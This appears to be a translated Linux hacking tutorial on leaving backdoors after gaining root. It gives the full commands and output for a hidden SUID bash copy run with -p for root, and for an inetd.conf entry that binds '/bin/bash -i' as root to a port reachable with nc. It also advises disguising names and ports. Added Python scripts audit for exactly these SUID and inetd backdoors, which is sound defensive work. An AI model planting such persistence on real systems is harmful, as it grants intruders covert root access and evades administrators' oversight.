You are now a root user and want to leave a backdoor.
System environment:
dawg:~# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux
1. SUID shell
First, switch to the root user and run the following commands:
dawg:~# cp /bin/bash /.woot
dawg:~# chmod 4755 /.woot
dawg:~# ls -al /.woot
-rwsr-xr-x 1 root 690668 Jul 24 /.woot
Of course, you can also give it a less conspicuous name; I am sure you can think of plenty of good ones. Hiding the file is not strictly necessary (a leading "." in the file name hides it from a plain directory listing in any directory).
Now, as an ordinary user, we can use this backdoor:
fw@dawg:~$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
fw@dawg:~$ /.woot
.woot-2.05b$ id
uid=1000(fw) gid=1000(fw) groups=1000(fw)
.woot-2.05b$
Why doesn't it work?
Because bash 2 has some protection against being run SUID (it drops the effective uid on startup), but that protection is easily bypassed:
.woot-2.05b$ /.woot -p
.woot-2.05b# id
uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)
With the -p parameter we get a root shell. euid is the effective user id (brush up on the difference between real and effective ids if needed).
Note that an ordinary user must run this SUID shell by its full path.
TIPS:
How to find files with the SUID bit set:
dawg:~# find / -perm +4000 -ls
This lists every file that has the SUID bit set.
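The find command above is what the 2003-era GNU find accepted; modern GNU find rejects the "+4000" form and expects "-perm -4000" (or "-perm /4000"). Either way, the raw list is only useful against a baseline, so here is an added example (not code from the original post) that does the defender's side of this section: it walks a tree, collects SUID files, and flags any that is missing from a baseline of expected SUID binaries, is a hidden dot-file, or has exactly the same content as a known shell such as /bin/bash. A root-owned copy of bash with mode 4755, like the /.woot above, trips all three checks. The baseline file format, the function names and the list of shell paths are this example's own assumptions.

```python
#!/usr/bin/env python3
"""Audit a directory tree for SUID files that look like planted shells.

Added example for this page, not code from the original post. It walks a tree,
collects every regular file with the setuid bit, and reports the ones that
(a) are not in a baseline of expected SUID binaries, (b) are hidden dot-files,
or (c) have the same content as a known shell binary.
"""
import hashlib
import os
import stat


def sha256_of(path):
    """Hex SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suid(root):
    """Return sorted paths of regular files under root with the setuid bit set.
    lstat is used so symlinks are neither followed nor counted as SUID."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry: skip rather than abort
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit_suid(root, baseline, known_shells=()):
    """Map each suspicious SUID file under root to the list of reasons.

    baseline:     set of paths expected to be SUID (a package list or a
                  snapshot taken from a known-clean system).
    known_shells: paths of legitimate shell binaries; a SUID file whose
                  content hashes to the same value is reported as a copied shell.
    """
    shell_hashes = {}
    for shell in known_shells:
        try:
            shell_hashes[sha256_of(shell)] = shell
        except OSError:
            pass  # shell not present on this host; nothing to compare against

    findings = {}
    for path in find_suid(root):
        reasons = []
        if path not in baseline:
            reasons.append("not in SUID baseline")
        if os.path.basename(path).startswith("."):
            reasons.append("hidden dot-file")
        try:
            digest = sha256_of(path)
        except OSError:
            digest = None
        if digest in shell_hashes:
            reasons.append("copy of shell %s" % shell_hashes[digest])
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    import sys
    # Usage: suid_audit.py [root] [baseline file with one expected SUID path per line]
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    baseline = set()
    if len(sys.argv) > 2:
        with open(sys.argv[2]) as f:
            baseline = {line.strip() for line in f if line.strip()}
    # Assumed shell locations; adjust for the host being audited.
    shells = [p for p in ("/bin/bash", "/bin/sh", "/bin/dash") if os.path.exists(p)]
    for path, reasons in audit_suid(root, baseline, shells).items():
        print("%s: %s" % (path, "; ".join(reasons)))
```

Run it as root against "/" with a baseline generated on a freshly installed host; an empty baseline simply reports every SUID file, which is still the find output above with the dot-file and copied-shell checks layered on top.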
2. Remote backdoor: using /etc/inetd.conf
We edit /etc/inetd.conf with vi.
Original file:
#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
Change it to:
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
daytime stream tcp nowait root /bin/bash -i
Start inetd:
dawg:~# inetd
If inetd is already running and you want to force it to reload:
dawg:~# ps -ef | grep inetd
root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
root 13769 13643 0 00:00:00 pts/1 grep inetd
dawg:~# kill -HUP 362
Now we can connect with nc and get in:
C:\tools>nc -v 192.168.1.77 13
192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.77] 13 (daytime) open
bash: no job control in this shell
bash-2.05b#
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b# uname -a
Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux
TIPS:
You can also edit /etc/services and add the following line:
woot 6666/tcp # edevil backdoor service
Then add to /etc/inetd.conf:
woot stream tcp nowait root /bin/bash -i
The port can be changed to a commonly used one to make it less conspicuous.
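Both inetd edits in this section leave a plain-text trace in two files, so the obvious defender's check is to parse them. Below is an added example (not code from the original post) that reads the classic inetd.conf line format, service socket_type proto wait|nowait user server_program [args], and flags an entry when its server program is an interactive shell, when a service that inetd normally handles internally (echo, discard, chargen, daytime, time) has been pointed at an external program, or when the service name has no /etc/services entry. The two sample files are constructed for this example and mirror the daytime and woot lines above; the shell-name list and the function names are assumptions of this example.

```python
#!/usr/bin/env python3
"""Audit /etc/inetd.conf (and /etc/services) for shell-as-server entries.

Added example, not code from the original post. Flags inetd.conf entries whose
server program is a shell, internal services redirected to a program, and
service names with no /etc/services entry.
"""
import os

# Assumed list of interactive shells; extend for the hosts you audit.
SHELL_NAMES = {"sh", "bash", "dash", "ash", "ksh", "csh", "tcsh", "zsh"}
# Services that inetd serves itself; they should never name a server program.
INTERNAL_SERVICES = {"echo", "discard", "chargen", "daytime", "time"}

SAMPLE_INETD = """\
# constructed sample of /etc/inetd.conf
#chargen dgram udp wait root internal
#discard stream tcp nowait root internal
daytime stream tcp nowait root /bin/bash -i
ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
woot stream tcp nowait root /bin/bash -i
"""

SAMPLE_SERVICES = """\
# constructed sample of /etc/services
daytime 13/tcp
ftp 21/tcp
woot 6666/tcp # edevil backdoor service
"""


def parse_inetd(text):
    """Return [(lineno, fields)] for each active (non-comment) inetd.conf entry."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # malformed entry; inetd ignores these as well
        entries.append((lineno, fields))
    return entries


def parse_services(text):
    """Return {service_name: (port, proto)} from /etc/services-style text,
    including aliases listed after the port/proto column."""
    services = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue
        port, proto = fields[1].split("/", 1)
        if not port.isdigit():
            continue
        for name in [fields[0]] + fields[2:]:
            services[name] = (int(port), proto)
    return services


def audit_inetd(inetd_text, services_text):
    """Return a list of (lineno, service, reason) findings."""
    services = parse_services(services_text)
    findings = []
    for lineno, fields in parse_inetd(inetd_text):
        service, user, server = fields[0], fields[4], fields[5]
        args = fields[6:]
        if os.path.basename(server) in SHELL_NAMES:
            findings.append((lineno, service,
                             "server program is a shell (%s %s) run as %s"
                             % (server, " ".join(args), user)))
        if service in INTERNAL_SERVICES and server != "internal":
            findings.append((lineno, service,
                             "built-in service redirected to external program %s" % server))
        if service not in services:
            findings.append((lineno, service, "service name not in /etc/services"))
    return findings


if __name__ == "__main__":
    import sys
    # Usage: inetd_audit.py [/etc/inetd.conf /etc/services]; defaults to the samples.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f:
            inetd_text = f.read()
        with open(sys.argv[2]) as f:
            services_text = f.read()
    else:
        inetd_text, services_text = SAMPLE_INETD, SAMPLE_SERVICES
    for lineno, service, reason in audit_inetd(inetd_text, services_text):
        print("inetd.conf line %d (%s): %s" % (lineno, service, reason))
```

On the sample input the ftp line passes (tcpd wrapping in.ftpd is normal), while the daytime line is reported twice, once for the shell and once for no longer being internal, and the woot line once for the shell. A real audit would also diff /etc/services against the distribution's copy, since the woot entry only exists because it was added by hand.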
In fact, the /etc/shadow file is only safe as long as the root password has not been cracked!